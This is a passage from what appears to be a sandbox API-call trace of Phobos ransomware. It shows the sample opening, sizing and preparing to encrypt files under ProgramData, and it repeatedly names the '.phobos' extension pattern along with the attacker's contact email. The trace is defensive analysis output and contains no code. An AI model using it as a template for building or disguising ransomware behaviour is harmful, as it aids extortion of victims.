"c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.258] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.258] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=51881) returned 1 [0121.258] CloseHandle (hObject=0x2ac) returned 1 [0121.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico")) returned 0x20 [0121.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.258] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.258] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.259] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=67664) returned 1 [0121.259] CloseHandle (hObject=0x2ac) returned 1 [0121.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico")) returned 0x20 [0121.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.259] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.259] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=49227) returned 1 [0121.259] CloseHandle (hObject=0x2ac) returned 1 [0121.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico")) returned 0x20 [0121.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.260] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.260] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=113140) returned 1 [0121.260] CloseHandle (hObject=0x2ac) returned 1 [0121.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico")) returned 0x20 [0121.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.260] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.261] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=53411) returned 1 [0121.261] CloseHandle (hObject=0x2ac) returned 1 [0121.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico")) returned 0x20 [0121.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.261] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.262] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.262] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=58312) returned 1 [0121.262] CloseHandle (hObject=0x2ac) returned 1 [0121.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico")) returned 0x20 [0121.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.262] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.263] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.263] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.263] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=60344) returned 1 [0121.263] CloseHandle (hObject=0x2ac) returned 1 [0121.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico")) returned 0x20 [0121.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.263] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.263] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.263] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.318] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=57333) returned 1 [0121.318] CloseHandle (hObject=0x2ac) returned 1 [0121.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico")) returned 0x20 [0121.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.318] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.319] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=60533) returned 1 [0121.319] CloseHandle (hObject=0x2ac) returned 1 [0121.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico")) returned 0x20 [0121.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.319] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.319] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.319] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.320] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=67156) returned 1 [0121.320] CloseHandle (hObject=0x2ac) returned 1 [0121.320] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico")) returned 0x20 [0121.320] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.320] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.320] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.320] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.320] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=63682) returned 1 [0121.320] CloseHandle (hObject=0x2ac) returned 1 [0121.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico")) returned 0x20 [0121.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.321] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.321] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.321] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0121.321] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=15616) returned 1 [0121.321] CloseHandle (hObject=0x2ac) returned 1 [0121.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll")) returned 0x20 [0121.322] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.322] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.322] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.322] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0121.395] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=254216) returned 1 [0121.396] CloseHandle (hObject=0x2b4) returned 1 [0121.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll")) returned 0x20 [0121.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0121.396] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0121.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0121.396] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=14972) returned 1 [0121.396] CloseHandle (hObject=0x2b4) returned 1 [0121.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl")) returned 0x20 [0121.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0121.396] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0121.396] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3dcf940 | out: lpNewFilePointer=0x0) returned 1 [0121.397] SetFilePointerEx (in: hFile=0x2b4, 